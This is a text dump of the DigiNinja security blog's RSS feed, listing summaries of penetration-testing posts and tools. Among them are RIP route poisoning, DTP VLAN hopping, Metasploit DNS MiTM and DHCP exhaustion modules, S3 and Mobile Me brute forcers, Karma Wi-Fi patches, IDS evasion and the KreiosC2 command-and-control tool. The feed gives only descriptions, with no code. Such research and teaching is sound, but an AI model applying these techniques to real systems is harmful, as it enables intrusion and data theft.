DigiNinja http://digi.ninja/rss.xml Security and general IT tools and tips en-gb Copyright Robin Wood 2014-07-29T21:50:48+01:00 DigiNinja IT Security A Pipal analysis of the Manga Traders password dump, some interesting results when looking at demographics and reuse of username/email addresses as passwords. http://digi.ninja/projects/pipal.php#mangatraders A Pipal analysis of the Manga Traders password dump, some interesting results when looking at demographics and reuse of username/email addresses as passwords. http://digi.ninja/projects/pipal.php#mangatraders A new Pipal checker to look at the relationship between email addresses and passwords. http://digi.ninja/blog/pipal_email_checker.php A new Pipal checker to look at the relationship between email addresses and passwords. http://digi.ninja/blog/pipal_email_checker.php My opinion on the eBay password reset policy - no pasting and 20 character caps are bad. http://digi.ninja/blog/ebay.php My opinion on the eBay password reset policy - no pasting and 20 character caps are bad. http://digi.ninja/blog/ebay.php Custom word list generator based on tweets - Update to use the new Twitter search API http://digi.ninja/projects/twofi.php Twofi takes keywords and usernames and collects tweets based on these terms. It then extracts individual words and uses them to create a custom word list - Update to use the new Twitter search API http://digi.ninja/projects/twofi.php A script I knocked together to import issues from my DradisPro install into MediaWiki so they could be the start of my issues library. http://digi.ninja/projects/mediawiki_dradis_import.php For quite a while now I've been planning to import all my Dradis issues into MediaWiki to make reusing issues easier. Till now, each time I wanted to reuse an issue I've had to open a new browser and go back to find the old project where the issue was used then copy and paste it into the new project, that is a real pain to do. So I finally bit the bullet and created a MediaWiki VM. Rather than mess around with manually copying all my issues across I developed this little script to automate it. http://digi.ninja/projects/mediawiki_dradis_import.php Do you include steps to reproduce vulnerabilities in your security reports? In this post I think about how to do this. http://digi.ninja/blog/reproduce_report.php Three times in the past few months I've been asked by clients to retest previous findings to see if they have been successfully fixed. One of the reports I was given was one I'd written, the other two were by other testers. For my report I couldn't remember anything about the test, reading the report gave me some clues but I was really lucky and found that I'd left myself a test harness in the client's folder fully set up to test the vulnerability. One of the other two was testing for a vulnerability I'd never heard of and couldn't find anything about on Google. I finally tracked down the original tester and it turns out there is a simple tool which tests for the issue and one command line script later the retest was over. The final issue was one that I knew about but had a really good write up that, even if I'd not heard of it, had a full walk through on how to reproduce the test. http://digi.ninja/blog/reproduce_report.php Part two of the exploiting RIP series, this time looking at RIPv2 and it's authentication mechanisms. http://digi.ninja/blog/rip_v2.php In part one of this series, Exploiting RIP, we set up a GNS3 lab with RIPv1 and managed to exploit it by injecting a fake route into the network. As a way to protect against this, RIPv2 can use authentication to try to stop unauthorised routes being added to the system. From what I've read, authentication was not added to RIPv2 as a security mechanism but as a way to prevent routes from accidentally being added when incorrectly configured routers are added to the network. In this post I'll work through changing the lab from version 1 to version 2 and then enabling the different levels of authentication. At each stage I will show weaknesses in the system and ways to abuse them. http://digi.ninja/blog/rip_v2.php A Pipal analysis of the recent Tesco password disclosure. http://digi.ninja/projects/pipal.php#tesco A Pipal analysis of the recent Tesco password disclosure. http://digi.ninja/projects/pipal.php#tesco Write up of my efforts to track down what turned out to be an accidental DoS against my Gmail account. http://digi.ninja/blog/gmail_dos.php If anyone was watching my Twitter feed over the last few days you'll have seen me complaining about my Gmail account being down. It wasn't down completely, I could still access the web interface and read all old mails but hadn't had any new emails in since 4AM on Thursday. I have various other mail accounts, some Gmail, some not, so I tried sending myself mails from those account to see if things were broken or whether I had just become very unpopular. None of the mails got through. I also tested sending emails out and none of those worked either so there was definitely a problem. By Friday lunchtime I'd had a couple of mails but nothing much so I figured I'd better do some digging and get it fixed. http://digi.ninja/blog/gmail_dos.php Setting up a RIPv1 lab in GNS3 and then exploiting it to poison routes between two machines. http://digi.ninja/blog/rip_v1.php In this lab I'm going to look at RIPv1, probably the most basic routing protocol. As with the VLAN labs I'm building this one in GNS3 and linking it to a Virtual Box machine running Debian. The plan is to build a network with three routers all using RIP to sync their routing information. I'll then use the attacking box to inject a fake route into the network and so divert traffic away from its real target. If you are not familiar with RIP it is hop based system where each hop is a unit and traffic is routed across the shortest number of hops. http://digi.ninja/blog/rip_v1.php Abusing Cisco Dynamic Trunking Protocol, DTP, to change a switch port from access to trunk mode to gain access to all VLAN traffic. http://digi.ninja/blog/abusing_dtp.php In the first two parts of this dig into layer 2 I covered how to set up a lab using GNS3 and VirtualBox and then adding and interacting with VLANs. In this part I want to look at using Cisco's Dynamic Trunking Protocol - DTP - to change the state of a port from access mode to trunk mode to allow us to gain access all the VLANs on the network. The previous link gives a more thorough overview of DTP but in summary, it is a protocol developed by Cisco to allow devices connected to a switch negotiate whether they need their port to be in trunk or access mode. It is enabled by default on all ports so has to be deliberately disabled by an admin to turn it off. Ports default to access mode leaving devices such as switches, which need a trunk port, to request it. A port can be changed from one state to the other through a single DTP packet and there is no authentication, this makes it great as an attacker as you can easily switch your port to trunk mode on any switch which has DTP enabled. http://digi.ninja/blog/abusing_dtp.php Adding VLANs to the GNS3/VirtualBox Lab http://digi.ninja/blog/gns_vbox_vlan_lab.php Adding VLANs to the GNS3/VirtualBox Lab - In this post I show how to add VLANs to the lab and how to move between them on the switch. I then show what can happen if you get on to a trunk port and get to control your own VLAN tagging. http://digi.ninja/blog/gns_vbox_vlan_lab.php Integrating GNS3 and VirtualBox - This is the first part of a series integrating GNS3 and VirtualBox to build a lab to play with layer 2 attacks http://digi.ninja/blog/gns_vbox_basic_lab.php Integrating GNS3 and VirtualBox - Having come from a development background rather than a sys-admin one, my knowledge of layer 2 is not as good as I'd like it to be so I've decided to do something about it. I've always been interested in VLANs and the idea of bypassing them so thought that would be a good place to start. This is the first part of a series building a lab to test out different layer 2 attacks. http://digi.ninja/blog/gns_vbox_basic_lab.php Sitemap2Proxy takes the sitemap published by a web app and requests each page through your specified proxy. This release adds response code stats to the output. http://digi.ninja/projects/sitemap2proxy.php Sitemap2Proxy takes the sitemap published by a web app and requests each page through your specified proxy. This release adds response code stats to the output. http://digi.ninja/projects/sitemap2proxy.php Building a lab with ModSecurity and DVWA. http://digi.ninja/blog/modsecurity_lab.php I've been meaning to build a ModSecurity lab for a while and seeing as I had some free time I decided it was about time to do it and to document it for everyone to share. The lab I built uses an up-to-date version of ModSecurity with a rule set taken from the SpiderLabs github repo and, so there is something to attack, I've included DVWA. http://digi.ninja/blog/modsecurity_lab.php Version 5.0 of CeWL adds proxy and basic/digest authentication support along with a few small bug fixes. http://digi.ninja/projects/cewl.php Version 5.0 of CeWL adds proxy and basic/digest authentication support along with a few small bug fixes. http://digi.ninja/projects/cewl.php Extract meta data from videos taken on iPhones. http://digi.ninja/projects/ivmeta.php ivMeta is based on information in this article on finding meta data in iPhone videos. It will attempt to pull the following bits of information from an iPhone video: * Maker - should always be Apple * iOS Software version * Date video was taken * GPS co-ords where video was taken * Model of phone http://digi.ninja/projects/ivmeta.php The second part of my introduction to using ZAP to test web sockets, this part focuses on fuzzing. http://digi.ninja/blog/zap_fuzzing.php The following article is part two of my introduction to ZAP and testing web sockets, in this episode I'll cover fuzzing. If you've not used ZAP before I suggest you look at some of the official tutorials first - ZAP home page, Videos. You can find my first part here OWASP ZAP and Web Sockets. The testing is being done against a small web sockets based app I wrote called SocketToMe which has a few published services along with a few unpublished ones. In this article we are going to look at one of the published ones and try to identify some of the unpublished ones. The first feature I'll investigate is the number guessing game. Here the system picks a random number between 1 and 100 and you have to guess it. I'm going to cheat and see if I can get ZAP to play all 100 numbers for me to go for a quick win. http://digi.ninja/blog/zap_fuzzing.php I recently decided it was time to learn how to test web sockets and so decided to take the opportunity to learn a bit about how ZAP works. This two part blog post covers a brief into to ZAP and how it interacts with web sockets and then looks in depth at how to fuzz them. http://digi.ninja/blog/zap_web_sockets.php With the slow uptake of HTML5, web sockets are going to start being seen in more and more applications so I figured I'd better learn how to test them before being put in front of them on a client test and having to learn as I went along. I figured the best way to do this was to build a very simple application then throw in a proxy and see what happened. Unfortunately my proxy of choice, Burp Suite, currently doesn't handle web sockets so I had to look for one that did. The only one, and this is their claim, that does in the OWASP Zed Attack Proxy, or ZAP for short. I'd been meaning to learn how to use it for a while so this seemed like the perfect opportunity. If anything in here is wrong, please get in touch and I'll fix it, I'm learning as I go along so may well be doing the odd thing wrong however it does all seem to work. I started by writing a small web socket based app which I called SocketToMe which has a few basic services, chat, a number guess game and a couple of other features. I figured I'd start with interception then have a look at fuzzing. http://digi.ninja/blog/zap_web_sockets.php A web socket based application which goes along side the blog post on ZAP and web sockets. http://digi.ninja/projects/sockettome.php SocketToMe is little application I wrote to go along with my blog post on testing web sockets. It combines chat, a simple number guessing game and a few other hidden features. The app is in two parts, the web socket app and a web page to access it. The whole lot is written PHP and is the first web socket work I've done so don't look on it as an example of how to do things. http://digi.ninja/projects/sockettome.php Pipal now has a modular structure allowing you to write your own Checkers and Splitters, this is a brief introduction to how they both work. http://digi.ninja/blog/pipal_goes_modular.php Pipal now has a modular structure allowing you to write your own Checkers and Splitters, this is a brief introduction to how they both work. http://digi.ninja/blog/pipal_goes_modular.php A proof of concept application which takes observed key presses and generates a list of potential passwords. http://digi.ninja/projects/pat_to_pass.php This months BruCON 5x5 project came from an idea sent to me by a friend after I released Passpat. Passpat takes passwords and tries to find keyboard patters in them, Pat to Pass is almost the opposite, it takes observed key presses and tries to convert them to potential passwords. The project in its current state is more a proof of concept and sample code which hopefully can be taken forward to be turned into something practical by someone who has better skills at handling very large lists of data. http://digi.ninja/projects/pat_to_pass.php Enumerating shares on the SpiderOak network. http://digi.ninja/projects/spidering_spideroak.php Spidering SpiderOak - By looking at the differences between responses it is possible to enumerate valid account names and then shares on the SpiderOak network. This post covers how I researched this, the findings and how it could be fixed. http://digi.ninja/projects/spidering_spideroak.php A companion tool to Pipal which can spot keyboard patterns in password lists. http://digi.ninja/projects/passpat.php It is generally accepted that most passwords in common use are based on dictionary words however, some people decide to use keyboard patterns instead and to try to spot these I've created Passpat. Passpat uses data files containing the layouts of common keyboards to walk each word through the keyboard and score the word based on how close it is to being a pattern. For now I'm taking pattern to mean keys which are next to each other, while qpalzm is a pattern picking something like that up is currently out of the scope of this project. http://digi.ninja/projects/passpat.php A simple script to create files containing binary data. http://digi.ninja/projects/bin_gen.php While working on a new project I needed a way to create files containing binary data which I could control, for example all bytes from 0 to 255 in order or just a block of 10 0x03's, so I wrote bin_gen. There are loads of other ways to do this, especially in Linux, but for me this is quick and easy and I don't have to think to use it. http://digi.ninja/projects/bin_gen.php Using Google Analytics tracking codes to find relationships between domains. http://digi.ninja/projects/tracker_tracking.php When doing reconnaissance on clients it is often useful to try to identify other websites or companies who are related to your target. One way to do this is to look at who is managing the Google Analytics traffic for them and then find who else they manage. There are a few online services which do this, the probably best known being ewhois, but whenever you use someone else's resources you are at their mercy over things like accuracy of the data and coverage, especially if you are working for a small client who hasn't been scanned by them then you won't get any results. This is where my tracker tracking tool comes in. The tool is in two parts, the first uses the power of the nmap engine to scan all the domains you are interested in and pull back tracking codes, these are then output in the standard nmap format along with the page title. I've then written a second script which takes the output and generates a grouped and sorted CSV file which you can then analyse. http://digi.ninja/projects/tracker_tracking.php How I'm going to spend my share of the 25,000 euro BruCON 5x5 cash. http://digi.ninja/blog/brucon_5x5.php During BruCON 2012 the organisers announced a very generous competition, they had collected 25,000euro and were going to offer it in 5k euro chunks to five lucky hackers. The condition was you had to submit a proposal saying why you needed the cash. You can read more about it on the BruCON Blog. I've very please to say that I was one of the chosen hackers so want to document what I'm going to do with my share of the cash. http://digi.ninja/blog/brucon_5x5.php Abusing a DDNS service to find IP cameras around the world. http://digi.ninja/projects/ip_camera_finder.php When I bought an IP camera to watch by daughters cot I didn't expect to end up writing tools to find others around the world, I also didn't expect it to be so poorly secured. http://digi.ninja/projects/ip_camera_finder.php An idea for a report writing competition http://digi.ninja/blog/report_writing_comp.php A lot of conferences have CTFs but how about testing people's report writing skills as well? This post contains some ideas I've had to run a competition which would test report writing skills. http://digi.ninja/blog/report_writing_comp.php A Metasploit module for enumerating directories and files through MySQL http://digi.ninja/metasploit/mysql_file_enum.php Tim Tomes wrote a blog post on enumerating directories and files through a MySQL connection, this module automates that process. http://digi.ninja/metasploit/mysql_file_enum.php DNS reconnaissance against wildcard domains http://digi.ninja/blog/dns_wildcard_recon.php I recently did a test against a company and in the debrief they asked how I managed to enumerate so many of their subdomains as they were using a wildcard DNS setup and the previous tester had commented that it prevented DNS enumeration. When I explained to them how the wildcard only obscured valid domains they had a few choice words for the previous tester and I figured it would make a nice little blog post. http://digi.ninja/blog/dns_wildcard_recon.php A story about Hakin9, the kings of spam http://digi.ninja/blog/hakin9_spam_kings.php About once a fortnight I get a request to write an article for Hakin9 or one of its sister publications, this article details my attempts to stop this spam. http://digi.ninja/blog/hakin9_spam_kings.php A review of the Corelan Live Win32 Exploit Dev Bootcamp http://digi.ninja/blog/corelan.php I've just got back from BruCON 2012 where I started the week with the Corelan Live - Win32 Exploit Development Bootcamp. A lot of people asked about the course and what it covered so I've put this together. http://digi.ninja/blog/corelan.php Extract all URLs from a sitemap.xml file and request them through a proxy of your choosing. http://digi.ninja/projects/sitemap2proxy.php When doing a web app test you usually end up spidering the site you are testing but what if the site could tell you most of that all about theirhout you going hunting for it. Bring on sitemap.xml, a file used by a lot of sites to tell spiders, like Google, all about their content. This script takes that file and parses it to extract all the URLs then requests each one through your proxy of choice (Burp, ZAP, etc). Now this won't find anything that isn't mentioned in the file and it won't do any brute forcing but it is a nice way to identify all the pages on the site that the admins want you to know about. http://digi.ninja/projects/sitemap2proxy.php Version 4.3 of CeWL adds result sorting by word count, with optional display of the count, also various bug fixes. http://digi.ninja/projects/cewl.php Version 4.3 of CeWL adds result sorting by word count, with optional display of the count, also various bug fixes. http://digi.ninja/projects/cewl.php Hostapd Karma patches updated to hostapd version 1.0 http://digi.ninja/karma/ Hostapd was recently updated to version 1.0 so I've brought the Karma patches up-to-date. This release contains a fully patched source tarball and a patch file if you want to apply it to your own source. I've also added a mention of the hostapd_cli app which you can use to control hostapd once it is running. http://digi.ninja/karma/ Are signs of the zodiac used as passwords? http://digi.ninja/blog/zodiac_passwords.php I was wondering why dragon and monkey come up so often in Pipal analysis of password lists and it got me wondering if it was to do with Chinese signs of the zodiac so just as an experiment I've just added checking for both Western and Chinese zodiac signs to Pipal. I ran it against the 1 million eHarmony passwords I've got and it looks like they do play a small part in some people passwords. http://digi.ninja/blog/zodiac_passwords.php Did you know Linux groups can have passwords? http://digi.ninja/blog/group_password.php Did you know Linux groups can have passwords? I didn't but I do now, this is how you set them up. http://digi.ninja/blog/group_password.php Custom word list generator based on tweets http://digi.ninja/projects/twofi.php Twofi takes keywords and usernames and collects tweets based on these terms. It then extracts individual words and uses them to create a custom word list. http://digi.ninja/projects/twofi.php Are secure web frameworks reducing long term security? http://digi.ninja/blog/web_frameworks.php Are secure web frameworks reducing long term security? Why I think developers should always think about security, even when someone else is taking care of it for them. http://digi.ninja/blog/web_frameworks.php Version 4.2 of CeWL which fixes a major problem found in the spider I'm using. http://digi.ninja/projects/cewl.php Turns out that the spider I'm using for CeWL only checks for links in anchor tags where the href uses double quotes which means some links will have been missed. This release fixes that bug and adds the ability to do a depth of 0 search which lets you scan a single page. http://digi.ninja/projects/cewl.php This is part two of my write up of the findings from the Breaking In survey. http://digi.ninja/projects/breaking_in_part_2.php The second part of my write up of the conclusions I've taken from my Breaking In data. This part looks at the qualitative answers given which give some meaning behind some of the stats. http://digi.ninja/projects/breaking_in_part_2.php This is part one of my write up of the findings from the Breaking In survey. http://digi.ninja/projects/breaking_in_part_1.php This post, along with part two coming soon, is an accompaniment to my BSides slides and the raw data which I published the other day. Here I try to summarise the results and add my commentry to them. http://digi.ninja/projects/breaking_in_part_1.php My slides for my BSides London talk on Breaking in to Security http://digi.ninja/projects/breaking_in_bsides.php At BSides London I presented the findings from the Breaking in to Security survey, here are my slides and a link to the data collected so far. http://digi.ninja/projects/breaking_in_bsides.php A set of interim results from my survey, how do I get started in security?. http://digi.ninja/projects/breaking_in_interim.php Seeing as I had over 200 responses to the "Breaking In" survey in just 5 days I've plucked out a couple of interesting stats from the responses and posted them to whet your appitite. http://digi.ninja/projects/breaking_in_interim.php A copy of my slides from OWASP Leeds covering the perils of autoconfiguring web cams with a bonus set presenting 'Whats in Amazon's buckets' http://digi.ninja/blog/owasp_leeds.php The story of how I analysed a new IP web camera and found how it automatically tried to punch a hole through my firewall and register itself with dynamic DNS server to tell the world it was there. The slides also contain a bonus talk covering my blog post and project on 'Whats in Amazon's buckets' http://digi.ninja/blog/owasp_leeds.php Ever wanted to ask, or help answer the question, how do I get started in security?. http://digi.ninja/projects/breaking_in_1.php This is my attempt to collect enough data to be able to answer the eternal question, 'How do I get started in Information Security?'. I've put together a questionnaire which I'll summarize the answers from and hopefully present at conferences and also summarise here on the site. http://digi.ninja/projects/breaking_in_1.php A domain set up to help teach and explain DNS zone transfers. http://digi.ninja/projects/zonetransferme.php Ever found yourself in a position where you have to teach or explain DNS zone transfers but not had a domain to run the transfer on? This domain is set up to allow transfers and contains plenty of information to work with. I've also explained how I would interpret the information. http://digi.ninja/projects/zonetransferme.php Pipal is a password analysis tool http://digi.ninja/projects/pipal.php Pipal analyses a cracked password list to help analysts spot patterns. Stats are generated on everything from the different lenghts to the character types to the words that other words are based on. http://digi.ninja/projects/pipal.php How I found the CHECK Team Leader Web Application exam http://digi.ninja/blog/check_ctl.php A write up on my experiences taking, and passing, the CHECK Team Leader Web App Exam http://digi.ninja/blog/check_ctl.php A description of the different attack modes in Burp Intruder http://digi.ninja/blog/burp_intruder_types.php Burp Intruder has four different attack modes, this post shows the differences between those four modes. http://digi.ninja/blog/burp_intruder_types.php Using decompression to avoid filters http://digi.ninja/blog/compress_filter_avoidance.php Using decompression to avoid filters - Decompressing data to get it past filters such as IDS. http://digi.ninja/blog/compress_filter_avoidance.php An application to parse files such as .DS_Store to reveal otherwise unlinked files on web sites. http://digi.ninja/projects/fdb.php File Disclosure Browser, an application to parse files such as .DS_Store to reveal otherwise unlinked files on web sites. http://digi.ninja/projects/fdb.php CeWL Version 4 http://digi.ninja/projects/cewl.php An upgrade to Ruby version 1.9 and fixes to work with Back Track 5. http://digi.ninja/projects/cewl.php Wifi Honey http://digi.ninja/projects/wifi_honey.php Automation of setting up a bunch of APs and airodump-ng to work out what encryption a client is probing for. http://digi.ninja/projects/wifi_honey.php Analysing Mobile Me http://digi.ninja/blog/analysing_mobile_me.php Analysis of the content I found when trawling Mobile Me accounts looking for public information. http://digi.ninja/blog/analysing_mobile_me.php Mobile Me Madness http://digi.ninja/blog/mobile_me_madness.php A brief description of how Mobile Me allows access to its file listings and how to interpret them. http://digi.ninja/blog/mobile_me_madness.php A tool to brute force user accounts on Mobile Me http://digi.ninja/projects/me_finder.php This tool will brute force user accounts with Mobile Me and then enumerate files associated with any public accounts found. http://digi.ninja/projects/me_finder.php Analysing Amazons Buckets http://digi.ninja/blog/analysing_amazons_buckets.php Analysis of the content I found when trawling Amazon's buckets looking for public information. http://digi.ninja/blog/analysing_amazons_buckets.php Whats in Amazon's buckets? http://digi.ninja/blog/whats_in_amazons_buckets.php The description of how I wrote a tool to brute force bucket names from the Amazon S3 system and then take it a step further. http://digi.ninja/blog/whats_in_amazons_buckets.php A tool to brute force bucket names from Amazon S3 http://digi.ninja/projects/bucket_finder.php This tool will brute force bucket names from Amazon's S3 system and then enumerate files associated with any public buckets found. http://digi.ninja/projects/bucket_finder.php Going to WAR on Tomcat with Laundanum http://digi.ninja/blog/tomcat_laundanum.php Going to WAR on Tomcat with Laundanum - A short how to on using Laundanum to attack Tomcat servers and how to setup a lab to try it at home. http://digi.ninja/blog/tomcat_laundanum.php An update to my script to mine data out of Google Profiles http://digi.ninja/projects/gpscan.php Google Profile scraping can be used a part of recon work to gather staff lists, this script automates that process http://digi.ninja/projects/gpscan.php A little trick to extract stored FTP details http://digi.ninja/blog/cleartext_creds.php A little trick to extract stored FTP details by setting up a fake server then capturing the clear text. http://digi.ninja/blog/cleartext_creds.php Double tunnels to help a colleague in distress. http://digi.ninja/blog/double_tunnel.php Double tunnels to help a colleague in distress - Setting up SSH tunnels to allow external access to an internal network. http://digi.ninja/blog/double_tunnel.php Tiger Scheme Check Team Member Exam - A review of the Check Team Member exam. http://digi.ninja/blog/tiger_ctm.php Tiger Scheme Check Team Member Exam - A review of the Check Team Member exam. http://digi.ninja/blog/tiger_ctm.php A Meterpreter script to download wireless profiles from Windows 7 and Vista boxes. http://digi.ninja/metasploit/getwlanprofiles.php A Meterpreter script to download wireless profiles from Windows 7 and Vista boxes. http://digi.ninja/metasploit/getwlanprofiles.php A short script to do frequency analysis on lines in a file. http://digi.ninja/projects/counter.php A short script to do frequency analysis on lines in a file, specifically designed for password reuse analysis. http://digi.ninja/projects/counter.php When All You Can Do Is Read. http://digi.ninja/blog/when_all_you_can_do_is_read.php A look at what files are good to try to read when all you have is read only access to a machine, i.e. no directory listing ability. http://digi.ninja/blog/when_all_you_can_do_is_read.php Nessus Through SOCKS Through Meterpreter. http://digi.ninja/blog/nessus_over_sock4a_over_msf.php Running a Nessus scan through a Meterpreter pivot using a SOCKS4 Proxy. http://digi.ninja/blog/nessus_over_sock4a_over_msf.php A modular brute force tool currently supporting HTTP(S), MySQL and SSH. http://digi.ninja/projects/rsyaba.php A modular brute force tool currently supporting HTTP(S), MySQL and SSH. Written in Ruby and designed to be easily extendable by using off the shelf protocol libraries. http://digi.ninja/projects/rsyaba.php HTTP Banner Grabbing Beyond The Root http://digi.ninja/blog/http_banner_grab_dir.php HTTP Banner grabbing beyond the root, where do you do your web banner grabbing? http://digi.ninja/blog/http_banner_grab_dir.php Viewing Pages documents in Linux http://digi.ninja/blog/pages_linux.php Viewing Pages documents in Linux - A short shell script to display a document created in Pages in Linux http://digi.ninja/blog/pages_linux.php Do you have a second hand Trojan in your pocket? http://digi.ninja/blog/pocket_trojan.php The Trojan in your pocket - Do you know what your phone is doing? http://digi.ninja/blog/pocket_trojan.php A custom wordlist generator with a twist. http://digi.ninja/projects/rsmangler.php A custom wordlist generator that creates permutations of all the input words as well as just manipulating them individually http://digi.ninja/projects/rsmangler.php A Metasploit module to accompany my blog post on finding interesting data in MSSQL databases. http://digi.ninja/metasploit/mssql_idf.php A Metasploit module to accompany my blog post on finding interesting data in MSSQL databases. http://digi.ninja/metasploit/mssql_idf.php Automating searching through MSSQL databases for interesting data. http://digi.ninja/blog/finding_interesting_db_data.php Automating looking through MSSQL databases to find interesting sounding column names. Once found automating pulling back some sample data to give a feel as to whether it is worth investigating. http://digi.ninja/blog/finding_interesting_db_data.php This scan result beats any I've seen from Nessus, Nikto or Nmap http://digi.ninja/blog/ultrasound.php This scan result beats any I've seen from Nessus, Nikto or Nmap. I'm going to be a daddy! http://digi.ninja/blog/ultrasound.php Karma comes into the modern age with patches for hostapd. http://digi.ninja/karma/index.php Karma was originally written for Madwifi and I then updated it to work with Madwifi-ng. This update adds the same functionality to hostapd. http://digi.ninja/karma/index.php A pair of Metasploit modules to do DHCP exhaustion attack and then act as a DNS MiTM. http://digi.ninja/metasploit/dns_dhcp.php My DHCP and DNS Metasploit attack modules, now fixed up to work with Ruby 1.9.x http://digi.ninja/metasploit/dns_dhcp.php Convert Nessus v2 reports to CSV for easier manipulation and reporting. http://digi.ninja/projects/nexcser.php Converts Nessus v2 reports to various CSV files to help with reporting and continued scanning. http://digi.ninja/projects/nexcser.php Kismet log manipulation with GISKismet http://digi.ninja/blog/giskismet_ignore_gps.php A patch to GISKismet so it will import Kismet data which doesn't include GPS positions. http://digi.ninja/blog/giskismet_ignore_gps.php Updated Metasploit sound module http://digi.ninja/metasploit/session_created.php Now with added verbosity, reads IP address and port of connecting clients. http://digi.ninja/metasploit/session_created.php Metasploit DNS MiTM and DHCP Exhaustion modules http://digi.ninja/metasploit/dns_dhcp_beta.php I've updated these to run with the latest version of Metasploit. http://digi.ninja/metasploit/dns_dhcp_beta.php OSSEC rules for handling Kismet alerts files http://digi.ninja/projects/ossec_kismet_rules.php Handle alerts generated by Kismet Newcore in OSSEC. http://digi.ninja/projects/ossec_kismet_rules.php Convert a CSV file to an OSSEC rules file http://digi.ninja/projects/ossec_rule_converter.php Save the effort of having to keep an XML file up-to-date and create your rules in a spreadsheet then convert to XML with my app. http://digi.ninja/projects/ossec_rule_converter.php Whats behind the door? http://digi.ninja/blog/door.php I really want to know what is behind this door. http://digi.ninja/blog/door.php Don't just see on screen that you've got a new Metasploit session, be told by a nice lady. http://digi.ninja/metasploit/session_created.php A patch for Metasploit to have it play a wav file telling you a new session has been created. Similar to the Core 'Agent Deployed'. http://digi.ninja/metasploit/session_created.php Would you give out your password? http://digi.ninja/blog/password_experiment.php A write up of an experiment where I asked a class to give me their passwords. http://digi.ninja/blog/password_experiment.php CeWL Version 3 http://digi.ninja/projects/cewl.php Now with JS redirect checking and a bug fix for an issue I found in the ruby spider gem http://digi.ninja/projects/cewl.php Calc IP Range http://digi.ninja/projects/calc_ip_range.php Given a IP address calculate the top and bottom of its available subnet range http://digi.ninja/projects/calc_ip_range.php #secvidofday http://digi.ninja/blog/secvidofday.php What is #secvidofday and why am I doing it? http://digi.ninja/blog/secvidofday.php My AP Collection http://digi.ninja/blog/ap_collection.php I'm going to be doing some AP testing and this is a small part of the collection. http://digi.ninja/blog/ap_collection.php Releasing KreiosC2 version 3 http://digi.ninja/kreiosc2/ KreiosC2 can now channel data over TinyURL and JPEG as well as the original Twitter. http://digi.ninja/kreiosc2/ The start of the PenTester Scripting project http://digi.ninja/blog/pentester_scripting.php How I got involved in yet another new project, this time the PenTester Scripting community wiki http://digi.ninja/blog/pentester_scripting.php Metasploit DNS MiTM and DHCP Exhaustion modules http://digi.ninja/metasploit/dns_dhcp_beta.php Two new beta Metasploit modules, one for DNS MiTM and one for DHCP Exhaustion attacks http://digi.ninja/metasploit/dns_dhcp_beta.php Cool new Micro SD reader http://digi.ninja/blog/microsd.php This Micro SD reader is so small it is only just larger than the USB connector it is built on http://digi.ninja/blog/microsd.php New KreiosC2 language pack http://digi.ninja/projects/kreiosc2.php#download Split KreiosC2 commands over multiple tweets, a very simple example language http://digi.ninja/projects/kreiosc2.php#download Blindly Installing VMs and Using Live CDs http://digi.ninja/blog.php Do you know what the VM or live CD you have just downloaded really contains and if you don't, how do you find out? http://digi.ninja/blog.php KreiosC2 released http://digi.ninja/ Launching KreiosC2, version 2 of Twitterbot with new name and new dynamic language options http://digi.ninja/ New site launched http://digi.ninja/ I've finally got round to styling the new site http://digi.ninja/